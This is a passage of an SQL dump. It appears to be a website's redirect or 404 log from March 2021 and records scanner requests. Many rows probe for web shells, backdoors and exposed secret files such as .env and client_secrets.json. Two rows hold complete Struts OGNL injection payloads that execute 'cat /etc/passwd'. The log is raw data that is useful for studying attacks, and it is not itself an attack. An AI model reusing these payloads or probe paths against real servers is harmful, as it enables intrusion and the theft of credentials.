00:00:00',301),(19850,'https://ekvatorprint.com.ua/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/paste/images/feter.php',NULL,'http://ekvatorprint.com.ua/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/paste/images/feter.php','',1,0,'2021-03-23 15:46:17','0000-00-00 00:00:00',301),(19851,'https://ekvatorprint.com.ua/libraries/cms/form/data.php',NULL,'http://ekvatorprint.com.ua/libraries/cms/form/data.php','',1,0,'2021-03-23 16:11:34','0000-00-00 00:00:00',301),(19852,'https://ekvatorprint.com.ua/libraries/joomla/base/content-footer.php.suspected',NULL,'http://ekvatorprint.com.ua/libraries/joomla/base/content-footer.php.suspected','',1,0,'2021-03-23 17:26:57','0000-00-00 00:00:00',301),(19853,'https://ekvatorprint.com.ua/scarp/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/scarp/popup-pomo.php','',1,0,'2021-03-23 17:46:43','0000-00-00 00:00:00',301),(19854,'https://ekvatorprint.com.ua/media/m.php',NULL,'http://ekvatorprint.com.ua/media/m.php','',1,0,'2021-03-23 17:48:05','0000-00-00 00:00:00',301),(19855,'https://ekvatorprint.com.ua/install/models.php',NULL,'http://ekvatorprint.com.ua/install/models.php','',1,0,'2021-03-23 18:33:06','0000-00-00 00:00:00',301),(19856,'https://ekvatorprint.com.ua/language/sitemps.php',NULL,'http://ekvatorprint.com.ua/language/sitemps.php','',1,0,'2021-03-23 18:34:30','0000-00-00 00:00:00',301),(19857,'https://ekvatorprint.com.ua/wvc1/license.php',NULL,'http://ekvatorprint.com.ua/wvc1/license.php','',1,0,'2021-03-23 18:42:12','0000-00-00 00:00:00',301),(19858,'https://ekvatorprint.com.ua/text.php',NULL,'http://ekvatorprint.com.ua/text.php','',2,0,'2021-03-23 19:46:03','0000-00-00 00:00:00',301),(19859,'https://ekvatorprint.com.ua/language/lv-lv/lv-lv.localise4.php',NULL,'http://ekvatorprint.com.ua/language/lv-LV/lv-LV.localise4.php','',1,0,'2021-03-23 20:04:36','0000-00-00 00:00:00',301),(19860,'https://ekvatorprint.com.ua/components/com_foxcontact/idx.php',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/idx.php','',1,0,'2021-03-23 20:53:34','0000-00-00 00:00:00',301),(19861,'https://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/none/skins/default/.h..php.suspected',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/none/skins/default/.h..php.suspected','',1,0,'2021-03-23 21:11:11','0000-00-00 00:00:00',301),(19862,'https://ekvatorprint.com.ua/content/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/content/popup-pomo.php','',1,0,'2021-03-23 22:30:18','0000-00-00 00:00:00',301),(19863,'https://ekvatorprint.com.ua/pebb7z.php',NULL,'http://ekvatorprint.com.ua/pebb7z.php','',1,0,'2021-03-23 22:33:30','0000-00-00 00:00:00',301),(19864,'https://ekvatorprint.com.ua/32pone.php',NULL,'http://ekvatorprint.com.ua/32pone.php','',1,0,'2021-03-23 22:47:09','0000-00-00 00:00:00',301),(19865,'https://ekvatorprint.com.ua/components/sitemps.php',NULL,'http://ekvatorprint.com.ua/components/sitemps.php','',1,0,'2021-03-23 23:10:00','0000-00-00 00:00:00',301),(19866,'https://ekvatorprint.com.ua/images/banners/smile.php',NULL,'http://ekvatorprint.com.ua/images/banners/smile.php','',1,0,'2021-03-24 00:12:26','0000-00-00 00:00:00',301),(19867,'https://ekvatorprint.com.ua/parency/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/parency/popup-pomo.php','',1,0,'2021-03-24 01:40:18','0000-00-00 00:00:00',301),(19868,'https://ekvatorprint.com.ua/htqdhi.php',NULL,'http://ekvatorprint.com.ua/htqdhi.php','',1,0,'2021-03-24 02:05:29','0000-00-00 00:00:00',301),(19869,'https://ekvatorprint.com.ua/submitticket.php',NULL,'http://ekvatorprint.com.ua/submitticket.php','',1,0,'2021-03-24 02:25:48','0000-00-00 00:00:00',301),(19870,'https://ekvatorprint.com.ua/test/maint/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/test/maint/popup-pomo.php','',1,0,'2021-03-24 03:03:21','0000-00-00 00:00:00',301),(19871,'https://ekvatorprint.com.ua/doc.php/404.php',NULL,'http://ekvatorprint.com.ua/doc.php/404.php','',3,0,'2021-03-24 03:32:42','0000-00-00 00:00:00',301),(19872,'https://ekvatorprint.com.ua/wp-blog.php.suspected',NULL,'http://ekvatorprint.com.ua/wp-blog.php.suspected','',1,0,'2021-03-24 03:50:03','0000-00-00 00:00:00',301),(19873,'https://ekvatorprint.com.ua/wool.php.suspected',NULL,'http://ekvatorprint.com.ua/wool.php.suspected','',1,0,'2021-03-24 04:39:27','0000-00-00 00:00:00',301),(19874,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/ostora.php',NULL,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/ostora.php','',2,0,'2021-03-24 06:16:02','0000-00-00 00:00:00',301),(19875,'https://ekvatorprint.com.ua/language/logo_img.php',NULL,'http://ekvatorprint.com.ua/language/logo_img.php','',2,0,'2021-03-24 06:37:43','0000-00-00 00:00:00',301),(19876,'https://ekvatorprint.com.ua/templates/beez3/home.php',NULL,'http://ekvatorprint.com.ua/templates/beez3/home.php','',1,0,'2021-03-24 06:39:09','0000-00-00 00:00:00',301),(19877,'https://ekvatorprint.com.ua/images/tmp.php',NULL,'http://ekvatorprint.com.ua/images/tmp.php','',4,0,'2021-03-24 06:48:13','0000-00-00 00:00:00',301),(19878,'https://ekvatorprint.com.ua/files/wp-info.php',NULL,'http://ekvatorprint.com.ua/files/wp-info.php','',1,0,'2021-03-24 09:11:57','0000-00-00 00:00:00',301),(19879,'https://ekvatorprint.com.ua/wp-back.php.suspected',NULL,'http://ekvatorprint.com.ua/wp-back.php.suspected','',1,0,'2021-03-24 10:01:18','0000-00-00 00:00:00',301),(19880,'https://ekvatorprint.com.ua/modules/mod_verison/dsqindex.php',NULL,'http://ekvatorprint.com.ua/modules/mod_verison/dsqindex.php','',1,0,'2021-03-24 10:20:40','0000-00-00 00:00:00',301),(19881,'https://ekvatorprint.com.ua/cache/wp-plugins.php.suspected',NULL,'http://ekvatorprint.com.ua/cache/wp-plugins.php.suspected','',1,0,'2021-03-24 10:50:35','0000-00-00 00:00:00',301),(19882,'https://ekvatorprint.com.ua/281f.php',NULL,'http://ekvatorprint.com.ua/281f.php','',1,0,'2021-03-24 11:03:45','0000-00-00 00:00:00',301),(19883,'https://ekvatorprint.com.ua/index.action?method:#_memberaccess=@ognl.ognlcontext@default_member_access,#res=@org.apache.struts2.servletactioncontext@getresponse(),#res.setcharacterencoding(#parameters.encoding[0]),#w=#res.getwriter(),#s=new+java.util.scanner(@java.lang.runtime@getruntime().exec(#parameters.cmd[0]).getinputstream()).usedelimiter(#parameters.pp[0]),#str=#s.hasnext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.tostring&pp=\\\\a&ppp= &encoding=utf-8&cmd=cat /etc/passwd',NULL,'','',1,0,'2021-03-25 01:11:06','0000-00-00 00:00:00',301),(19884,'https://ekvatorprint.com.ua/names.nsf/people?openview',NULL,'','',1,0,'2021-03-25 01:11:06','0000-00-00 00:00:00',301),(19885,'https://ekvatorprint.com.ua/_search?pretty',NULL,'','',1,0,'2021-03-25 01:11:07','0000-00-00 00:00:00',301),(19886,'https://ekvatorprint.com.ua/devmode.action?debug=command&expression=(#_memberaccess[\"allowstaticmethodaccess\"]=true,#foo=new java.lang.boolean(\"false\") ,#context[\"xwork.methodaccessor.denymethodexecution\"]=#foo,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(\'cat /etc/passwd\').getinputstream()))',NULL,'','',1,0,'2021-03-25 01:14:13','0000-00-00 00:00:00',301),(19887,'https://ekvatorprint.com.ua/user.action',NULL,'','',1,0,'2021-03-25 01:27:45','0000-00-00 00:00:00',301),(19888,'https://ekvatorprint.com.ua/login.action',NULL,'','',2,0,'2021-03-25 01:27:46','0000-00-00 00:00:00',301),(19889,'https://ekvatorprint.com.ua/client_secrets.json',NULL,'','',1,0,'2021-03-25 04:24:37','0000-00-00 00:00:00',301),(19890,'https://ekvatorprint.com.ua/bitkeeper/etc/config',NULL,'','',1,0,'2021-03-25 04:24:37','0000-00-00 00:00:00',301),(19891,'https://ekvatorprint.com.ua/perl-status',NULL,'','',1,0,'2021-03-25 04:24:38','0000-00-00 00:00:00',301),(19892,'https://ekvatorprint.com.ua/config/databases.yml',NULL,'','',1,0,'2021-03-25 04:24:38','0000-00-00 00:00:00',301),(19893,'https://ekvatorprint.com.ua/webapi/v1/system/accountmanage/account',NULL,'','',2,0,'2021-03-25 04:24:38','0000-00-00 00:00:00',301),(19894,'https://ekvatorprint.com.ua/.circleci/ssh-config',NULL,'','',1,0,'2021-03-25 04:55:24','0000-00-00 00:00:00',301),(19895,'https://ekvatorprint.com.ua/index.php/component/k2/item/5',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/5','',8,0,'2021-03-25 14:56:44','0000-00-00 00:00:00',301),(19896,'https://ekvatorprint.com.ua/index.php/component/k2/item/10',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/10','',3,0,'2021-03-25 15:03:25','0000-00-00 00:00:00',301),(19897,'https://ekvatorprint.com.ua/heapdump',NULL,'','',1,0,'2021-03-25 15:17:35','0000-00-00 00:00:00',301),(19898,'https://ekvatorprint.com.ua/actuator/heapdump',NULL,'','',1,0,'2021-03-25 15:17:35','0000-00-00 00:00:00',301),(19899,'https://ekvatorprint.com.ua/index.php/component/k2/item/9',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/9','',2,0,'2021-03-25 17:32:13','0000-00-00 00:00:00',301),(19900,'https://ekvatorprint.com.ua/index.php/component/k2/item/7',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/7','',4,0,'2021-03-25 18:00:18','0000-00-00 00:00:00',301),(19901,'https://ekvatorprint.com.ua/index.php/component/k2/item/15',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/15','',2,0,'2021-03-25 19:00:39','0000-00-00 00:00:00',301),(19902,'https://ekvatorprint.com.ua/index.php/component/k2/item/8',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/8','',3,0,'2021-03-25 20:03:51','0000-00-00 00:00:00',301),(19903,'https://ekvatorprint.com.ua/index.php/component/k2/item/4',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/4','',4,0,'2021-03-25 21:02:12','0000-00-00 00:00:00',301),(19904,'https://ekvatorprint.com.ua/index.php/component/k2/item/13',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/13','',1,0,'2021-03-25 23:29:09','0000-00-00 00:00:00',301),(19905,'https://ekvatorprint.com.ua/index.php/component/k2/item/3',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/3','',4,0,'2021-03-26 00:30:22','0000-00-00 00:00:00',301),(19906,'https://ekvatorprint.com.ua/index.php/component/k2/item/6',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/6','',4,0,'2021-03-26 01:32:56','0000-00-00 00:00:00',301),(19907,'https://ekvatorprint.com.ua/index.php/component/k2/item/11',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/11','',5,0,'2021-03-26 04:25:39','0000-00-00 00:00:00',301),(19908,'https://ekvatorprint.com.ua/media/logo_img.php',NULL,'http://ekvatorprint.com.ua/media/logo_img.php','',1,0,'2021-03-26 08:05:47','0000-00-00 00:00:00',301),(19909,'https://ekvatorprint.com.ua/tmp/wso.php',NULL,'http://ekvatorprint.com.ua/tmp/wso.php','',2,0,'2021-03-26 09:44:42','0000-00-00 00:00:00',301),(19910,'https://ekvatorprint.com.ua/language/css.php',NULL,'http://ekvatorprint.com.ua/language/css.php','',1,0,'2021-03-26 10:03:06','0000-00-00 00:00:00',301),(19911,'https://ekvatorprint.com.ua/index.php/component/k2/item/2',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/2','',1,0,'2021-03-26 10:24:55','0000-00-00 00:00:00',301),(19912,'https://ekvatorprint.com.ua/.env.local',NULL,'','',2,0,'2021-03-26 10:36:32','0000-00-00 00:00:00',301),(19913,'https://ekvatorprint.com.ua/.env.example',NULL,'','',3,0,'2021-03-26 10:36:32','0000-00-00 00:00:00',301),(19914,'https://ekvatorprint.com.ua/.env.stage',NULL,'','',2,0,'2021-03-26 10:36:32','0000-00-00 00:00:00',301),(19915,'https://ekvatorprint.com.ua/.env.live',NULL,'','',2,0,'2021-03-26 10:36:33','0000-00-00 00:00:00',301),(19916,'https://ekvatorprint.com.ua/installer-backup.php',NULL,'http://ekvatorprint.com.ua/installer-backup.php','',4,0,'2021-03-26 11:14:09','0000-00-00 00:00:00',301),(19917,'https://ekvatorprint.com.ua/index.php/component/k2/item/14',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/14','',2,0,'2021-03-26 11:24:30','0000-00-00 00:00:00',301),(19918,'https://ekvatorprint.com.ua/systems.php',NULL,'http://ekvatorprint.com.ua/systems.php','',1,0,'2021-03-26 11:57:05','0000-00-00 00:00:00',301),(19919,'https://ekvatorprint.com.ua/lyonc.php',NULL,'http://ekvatorprint.com.ua/lyonc.php','',2,0,'2021-03-26 13:00:21','0000-00-00 00:00:00',301),(19920,'https://ekvatorprint.com.ua/components/com_foxcontact/z.php',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/z.php','',1,0,'2021-03-26 13:06:59','0000-00-00 00:00:00',301),(19921,'https://ekvatorprint.com.ua/plugins/sitemps.php',NULL,'http://ekvatorprint.com.ua/plugins/sitemps.php','',1,0,'2021-03-26 13:16:33','0000-00-00 00:00:00',301),(19922,'https://ekvatorprint.com.ua/libraries/joomla/template/ash.php.suspected',NULL,'http://ekvatorprint.com.ua/libraries/joomla/template/ash.php.suspected','',1,0,'2021-03-26 13:55:52','0000-00-00 00:00:00',301),(19923,'https://ekvatorprint.com.ua/templates/atomic/language/en-gb/content-post.php',NULL,'http://ekvatorprint.com.ua/templates/atomic/language/en-GB/content-post.php','',1,0,'2021-03-26 14:08:16','0000-00-00 00:00:00',301),(19924,'https://ekvatorprint.com.ua/ziyafo.php',NULL,'http://ekvatorprint.com.ua/ziyafo.php','',1,0,'2021-03-26 15:08:38','0000-00-00 00:00:00',301),(19925,'https://ekvatorprint.com.ua/images/theme.php',NULL,'http://ekvatorprint.com.ua/images/theme.php','',2,0,'2021-03-26 20:42:59','0000-00-00 00:00:00',301),(19926,'https://ekvatorprint.com.ua/logs/sitemps.php',NULL,'http://ekvatorprint.com.ua/logs/sitemps.php','',2,0,'2021-03-26 21:05:52','0000-00-00 00:00:00',301),(19927,'https://ekvatorprint.com.ua/surly/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/surly/popup-pomo.php','',1,0,'2021-03-27 03:59:55','0000-00-00 00:00:00',301),(19928,'https://ekvatorprint.com.ua/ctietu/girbkrl.php',NULL,'http://ekvatorprint.com.ua/ctietu/girbkrl.php','',2,0,'2021-03-27 04:06:05','0000-00-00 00:00:00',301),(19929,'https://ekvatorprint.com.ua/libraries/joomla/template/doc.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/template/doc.php','',5,0,'2021-03-27 04:47:00','0000-00-00 00:00:00',301),(19930,'https://ekvatorprint.com.ua/velocitydealerz/license.php',NULL,'http://ekvatorprint.com.ua/velocitydealerz/license.php','',1,0,'2021-03-27 05:02:13','0000-00-00 00:00:00',301),(19931,'https://ekvatorprint.com.ua/oz2gu9.php',NULL,'http://ekvatorprint.com.ua/oz2gu9.php','',1,0,'2021-03-27 06:26:51','0000-00-00 00:00:00',301),(19932,'https://ekvatorprint.com.ua/xmlrpc/sitemps.php',NULL,'http://ekvatorprint.com.ua/xmlrpc/sitemps.php','',1,0,'2021-03-27 06:44:40','0000-00-00 00:00:00',301),(19933,'https://ekvatorprint.com.ua/bk30012020/viruscode--/components/com_foxcontact/c_2018.php',NULL,'http://ekvatorprint.com.ua/bk30012020/viruscode--/components/com_foxcontact/c_2018.php','',2,0,'2021-03-27 07:07:05','0000-00-00 00:00:00',301),(19934,'https://ekvatorprint.com.ua/wp-content/plugins/goo/420.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/goo/420.php','',1,0,'2021-03-27 09:04:48','0000-00-00 00:00:00',301),(19935,'https://ekvatorprint.com.ua/wp-admin/plugin-install.php',NULL,'http://ekvatorprint.com.ua/wp-admin/plugin-install.php','',1,0,'2021-03-27 09:13:26','0000-00-00 00:00:00',301),(19936,'https://ekvatorprint.com.ua/wp-admin/edit-comments.php',NULL,'http://ekvatorprint.com.ua/wp-admin/edit-comments.php','',1,0,'2021-03-27 09:17:47','0000-00-00 00:00:00',301),(19937,'https://ekvatorprint.com.ua/admin/controller/extension/module/doc.php',NULL,'http://ekvatorprint.com.ua/admin/controller/extension/module/doc.php','',1,0,'2021-03-27 09:21:55','0000-00-00 00:00:00',301),(19938,'https://ekvatorprint.com.ua/wp-admin/network/edit.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/edit.php','',1,0,'2021-03-27 09:23:34','0000-00-00 00:00:00',301),(19939,'https://ekvatorprint.com.ua/wp-admin/options-discussion.php',NULL,'http://ekvatorprint.com.ua/wp-admin/options-discussion.php','',2,0,'2021-03-27 09:49:12','0000-00-00 00:00:00',301),(19940,'https://ekvatorprint.com.ua/wp-admin/network/plugin-editor.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/plugin-editor.php','',1,0,'2021-03-27 10:04:46','0000-00-00 00:00:00',301),(19941,'https://ekvatorprint.com.ua/wp-content/admin.php',NULL,'http://ekvatorprint.com.ua/wp-content/admin.php','',2,0,'2021-03-27 10:21:48','0000-00-00 00:00:00',301),(19942,'https://ekvatorprint.com.ua/wp-admin/options-writing.php',NULL,'http://ekvatorprint.com.ua/wp-admin/options-writing.php','',1,0,'2021-03-27 10:21:52','0000-00-00 00:00:00',301),(19943,'https://ekvatorprint.com.ua/wp-content/themes/distance-lite/languages/namespaces.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/distance-lite/languages/namespaces.php','',1,0,'2021-03-27 10:40:00','0000-00-00 00:00:00',301),(19944,'https://ekvatorprint.com.ua/wp-admin/user-new.php',NULL,'http://ekvatorprint.com.ua/wp-admin/user-new.php','',1,0,'2021-03-27 10:57:36','0000-00-00 00:00:00',301),(19945,'https://ekvatorprint.com.ua/wp-admin/comment.php',NULL,'http://ekvatorprint.com.ua/wp-admin/comment.php','',1,0,'2021-03-27 11:16:12','0000-00-00 00:00:00',301),(19946,'https://ekvatorprint.com.ua/wp-admin/network/plugin-install.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/plugin-install.php','',1,0,'2021-03-27 11:19:35','0000-00-00 00:00:00',301),(19947,'https://ekvatorprint.com.ua/wp-admin/network/credits.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/credits.php','',1,0,'2021-03-27 11:37:54','0000-00-00 00:00:00',301),(19948,'https://ekvatorprint.com.ua/wp-admin/tools.php',NULL,'http://ekvatorprint.com.ua/wp-admin/tools.php','',1,0,'2021-03-27 11:44:33','0000-00-00 00:00:00',301),(19949,'https://ekvatorprint.com.ua/wp-admin/options-permalink.php',NULL,'http://ekvatorprint.com.ua/wp-admin/options-permalink.php','',2,0,'2021-03-27 11:46:51','0000-00-00 00:00:00',301),(19950,'https://ekvatorprint.com.ua/wp-admin/network/sites.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/sites.php','',1,0,'2021-03-27 12:37:51','0000-00-00 00:00:00',301),(19951,'https://ekvatorprint.com.ua/wp-admin/widgets.php',NULL,'http://ekvatorprint.com.ua/wp-admin/widgets.php','',1,0,'2021-03-27 12:52:22','0000-00-00 00:00:00',301),(19952,'https://ekvatorprint.com.ua/wp-admin/network/admin.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/admin.php','',1,0,'2021-03-27 12:55:31','0000-00-00 00:00:00',301),(19953,'https://ekvatorprint.com.ua/wp-admin/user/user-edit.php',NULL,'http://ekvatorprint.com.ua/wp-admin/user/user-edit.php','',1,0,'2021-03-27 13:16:30','0000-00-00 00:00:00',301),(19954,'https://ekvatorprint.com.ua/wp-admin/ms-admin.php',NULL,'http://ekvatorprint.com.ua/wp-admin/ms-admin.php','',1,0,'2021-03-27 13:22:43','0000-00-00 00:00:00',301),(19955,'https://ekvatorprint.com.ua/wp-admin/upload.php',NULL,'http://ekvatorprint.com.ua/wp-admin/upload.php','',6,0,'2021-03-27 13:35:06','0000-00-00 00:00:00',301),(19956,'https://ekvatorprint.com.ua/wp-admin/user/freedoms.php',NULL,'http://ekvatorprint.com.ua/wp-admin/user/freedoms.php','',1,0,'2021-03-27 13:46:04','0000-00-00 00:00:00',301),(19957,'https://ekvatorprint.com.ua/wp-admin/network/freedoms.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/freedoms.php','',2,0,'2021-03-27 14:41:44','0000-00-00 00:00:00',301),(19958,'https://ekvatorprint.com.ua/wp-admin/link-add.php',NULL,'http://ekvatorprint.com.ua/wp-admin/link-add.php','',2,0,'2021-03-27 14:46:31','0000-00-00 00:00:00',301),(19959,'https://ekvatorprint.com.ua/wp-content/uploads/chn.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/chn.php','',2,0,'2021-03-27 14:58:26','0000-00-00 00:00:00',301),(19960,'https://ekvatorprint.com.ua/wp-admin/ms-themes.php',NULL,'http://ekvatorprint.com.ua/wp-admin/ms-themes.php','',1,0,'2021-03-27 15:01:33','0000-00-00 00:00:00',301),(19961,'https://ekvatorprint.com.ua/wp-admin/moderation.php',NULL,'http://ekvatorprint.com.ua/wp-admin/moderation.php','',1,0,'2021-03-27 15:14:04','0000-00-00 00:00:00',301),(19962,'https://ekvatorprint.com.ua/wp-admin/media-upload.php',NULL,'http://ekvatorprint.com.ua/wp-admin/media-upload.php','',1,0,'2021-03-27 15:21:34','0000-00-00 00:00:00',301),(19963,'https://ekvatorprint.com.ua/wp-admin/user/credits.php',NULL,'http://ekvatorprint.com.ua/wp-admin/user/credits.php','',1,0,'2021-03-27 16:23:59','0000-00-00 00:00:00',301),(19964,'https://ekvatorprint.com.ua/admin/controller/extension/module/ups.php',NULL,'http://ekvatorprint.com.ua/admin/controller/extension/module/ups.php','',1,0,'2021-03-27 16:39:02','0000-00-00 00:00:00',301),(19965,'https://ekvatorprint.com.ua/wp-admin/plugins.php',NULL,'http://ekvatorprint.com.ua/wp-admin/plugins.php','',3,0,'2021-03-27 17:00:32','0000-00-00 00:00:00',301),(19966,'https://ekvatorprint.com.ua/wp-content/uploads/2021/01/ups.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/2021/01/ups.php','',1,0,'2021-03-27 17:27:36','0000-00-00 00:00:00',301),(19967,'https://ekvatorprint.com.ua/components/com_b2jcontact/config.php',NULL,'http://ekvatorprint.com.ua/components/com_b2jcontact/config.php','',1,0,'2021-03-27 18:40:33','0000-00-00 00:00:00',301),(19968,'https://ekvatorprint.com.ua/clot/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/clot/popup-pomo.php','',1,0,'2021-03-27 18:46:35','0000-00-00 00:00:00',301),(19969,'https://ekvatorprint.com.ua/cli/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/cli/logo_img.php.suspected','',1,0,'2021-03-27 19:29:45','0000-00-00 00:00:00',301),(19970,'https://ekvatorprint.com.ua/components/com_b2jcontact/x0x04.php',NULL,'http://ekvatorprint.com.ua/components/com_b2jcontact/x0x04.php','',1,0,'2021-03-27 20:03:59','0000-00-00 00:00:00',301),(19971,'https://ekvatorprint.com.ua/components/com_content/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_content/views/index.php','',1,0,'2021-03-27 20:30:19','0000-00-00 00:00:00',301),(19972,'https://ekvatorprint.com.ua/wp-admin/user/admin.php',NULL,'http://ekvatorprint.com.ua/wp-admin/user/admin.php','',1,0,'2021-03-27 20:39:27','0000-00-00 00:00:00',301),(19973,'https://ekvatorprint.com.ua/components/com_foxcontact/wso.php',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/wso.php','',1,0,'2021-03-27 21:10:40','0000-00-00 00:00:00',301),(19974,'https://ekvatorprint.com.ua/wp-content/uploads/2020/12/ups.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/2020/12/ups.php','',2,0,'2021-03-27 21:23:54','0000-00-00 00:00:00',301),(19975,'https://ekvatorprint.com.ua/components/com_hello/hello.php',NULL,'http://ekvatorprint.com.ua/components/com_hello/hello.php','',1,0,'2021-03-27 21:25:32','0000-00-00 00:00:00',301),(19976,'https://ekvatorprint.com.ua/cache/strange.php',NULL,'http://ekvatorprint.com.ua/cache/strange.php','',1,0,'2021-03-27 21:39:23','0000-00-00 00:00:00',301),(19977,'https://ekvatorprint.com.ua/components/com_foxcontact/ok.php',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/ok.php','',1,0,'2021-03-27 21:45:40','0000-00-00 00:00:00',301),(19978,'https://ekvatorprint.com.ua/asynchpeople/',NULL,'','',1,0,'2021-03-27 22:14:13','0000-00-00 00:00:00',301),(19979,'https://ekvatorprint.com.ua/openapi.json',NULL,'','',1,0,'2021-03-27 22:14:13','0000-00-00 00:00:00',301),(19980,'https://ekvatorprint.com.ua/cache/js.php',NULL,'http://ekvatorprint.com.ua/cache/js.php','',1,0,'2021-03-27 22:53:06','0000-00-00 00:00:00',301),(19981,'https://ekvatorprint.com.ua/cli/css.php',NULL,'http://ekvatorprint.com.ua/cli/css.php','',1,0,'2021-03-27 22:55:14','0000-00-00 00:00:00',301),(19982,'https://ekvatorprint.com.ua/wp-admin/ms-delete-site.php',NULL,'http://ekvatorprint.com.ua/wp-admin/ms-delete-site.php','',1,0,'2021-03-27 23:32:34','0000-00-00 00:00:00',301),(19983,'https://ekvatorprint.com.ua/index.php/component/k2/item/25',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/25','',3,0,'2021-03-27 23:40:11','0000-00-00 00:00:00',301),(19984,'https://ekvatorprint.com.ua/index.php/component/k2/item/27',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/27','',1,0,'2021-03-27 23:56:13','0000-00-00 00:00:00',301),(19985,'https://ekvatorprint.com.ua/components/com_foxcontact/f.php',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/f.php','',1,0,'2021-03-28 00:10:49','0000-00-00 00:00:00',301),(19986,'https://ekvatorprint.com.ua/index.php/component/k2/item/22',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/22','',4,0,'2021-03-28 00:14:24','0000-00-00 00:00:00',301),(19987,'https://ekvatorprint.com.ua/components/up.php',NULL,'http://ekvatorprint.com.ua/components/up.php','',2,0,'2021-03-28 00:25:55','0000-00-00 00:00:00',301),(19988,'https://ekvatorprint.com.ua/cli/w.php',NULL,'http://ekvatorprint.com.ua/cli/w.php','',1,0,'2021-03-28 01:11:17','0000-00-00 00:00:00',301),(19989,'https://ekvatorprint.com.ua/components/com_allvideoshare/views/videos/.h..php',NULL,'http://ekvatorprint.com.ua/components/com_allvideoshare/views/videos/.h..php','',1,0,'2021-03-28 01:11:54','0000-00-00 00:00:00',301),(19990,'https://ekvatorprint.com.ua/components/search.class.php',NULL,'http://ekvatorprint.com.ua/components/search.class.php','',1,0,'2021-03-28 01:13:28','0000-00-00 00:00:00',301),(19991,'https://ekvatorprint.com.ua/cache/error.php',NULL,'http://ekvatorprint.com.ua/cache/error.php','',1,0,'2021-03-28 01:15:49','0000-00-00 00:00:00',301),(19992,'https://ekvatorprint.com.ua/components/com_foxcontact/e.php',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/e.php','',1,0,'2021-03-28 01:34:06','0000-00-00 00:00:00',301),(19993,'https://ekvatorprint.com.ua/wp-content/themes/greensblog/template-parts/simple.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/greensblog/template-parts/simple.php','',2,0,'2021-03-28 01:48:01','0000-00-00 00:00:00',301),(19994,'https://ekvatorprint.com.ua/components/com_weblinks/models/index.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/models/index.php','',2,0,'2021-03-28 02:56:26','0000-00-00 00:00:00',301),(19995,'https://ekvatorprint.com.ua/wp-admin/revision.php',NULL,'http://ekvatorprint.com.ua/wp-admin/revision.php','',1,0,'2021-03-28 03:07:09','0000-00-00 00:00:00',301),(19996,'https://ekvatorprint.com.ua/components/com_foxcontact/b0x.php',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/b0x.php','',1,0,'2021-03-28 03:10:49','0000-00-00 00:00:00',301),(19997,'https://ekvatorprint.com.ua/components/com_foxcontact/w.php',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/w.php','',3,0,'2021-03-28 03:26:36','0000-00-00 00:00:00',301),(19998,'https://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/fullscreen/htaccess.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/fullscreen/htaccess.php','',1,0,'2021-03-28 03:44:50','0000-00-00 00:00:00',301),(19999,'https://ekvatorprint.com.ua/an.php',NULL,'http://ekvatorprint.com.ua/an.php','',1,0,'2021-03-28 04:02:07','0000-00-00 00:00:00',301),(20000,'https://ekvatorprint.com.ua/index.php/component/k2/item/21',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/21','',2,0,'2021-03-28 04:13:06','0000-00-00 00:00:00',301),(20001,'https://ekvatorprint.com.ua/wp-admin/network/site-users.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/site-users.php','',2,0,'2021-03-28 04:29:29','0000-00-00 